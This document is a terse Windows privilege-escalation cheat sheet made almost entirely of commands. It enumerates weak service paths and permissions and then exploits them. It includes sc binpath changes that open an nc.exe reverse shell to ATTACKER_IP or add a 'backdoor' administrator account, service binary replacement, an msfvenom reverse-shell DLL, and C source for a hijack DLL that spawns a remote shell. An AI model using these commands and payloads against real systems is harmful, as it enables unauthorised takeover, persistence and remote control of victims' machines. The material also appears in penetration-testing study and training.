Service Exploits

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Get-CimInstance Win32_Service | Where-Object { $_.PathName -notmatch '"' -and $_.PathName -match ' ' } | Select Name, PathName, StartMode

C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My App\service.exe

icacls "C:\Program Files\My App"

accesschk.exe /accepteula -wdq "C:\Program Files\"

copy shell.exe "C:\Program Files\My.exe"
sc stop VulnService
sc start VulnService

accesschk.exe /accepteula -uwcqv "Everyone" *
accesschk.exe /accepteula -uwcqv "Users" *
accesschk.exe /accepteula -uwcqv "Authenticated Users" *

. .\PowerUp.ps1
Get-ModifiableService

sc config VulnService binpath= "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
sc stop VulnService
sc start VulnService

sc config VulnService binpath= "net user backdoor P@ssw0rd /add"
sc stop VulnService
sc start VulnService

sc config VulnService binpath= "net localgroup administrators backdoor /add"
sc stop VulnService
sc start VulnService

icacls "C:\Path\to\service.exe"

move service.exe service.exe.bak
copy shell.exe service.exe
sc stop VulnService
sc start VulnService

Result = NAME NOT FOUND
Path ends with .dll

1. Application directory
2. C:\Windows\System32
3. C:\Windows\System
4. C:\Windows
5. Current directory
6. PATH directories

$env:PATH -split ';' | ForEach-Object { icacls $_ 2>$null } | findstr /i "Everyone Users BUILTIN"

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o hijack.dll

#include <windows.h>
#include <stdlib.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        system("cmd.exe /c C:\\Windows\\Temp\\nc.exe -e cmd.exe ATTACKER_IP 4444");
    }
    return TRUE;
}

x86_64-w64-mingw32-gcc -shared -o hijack.dll hijack.c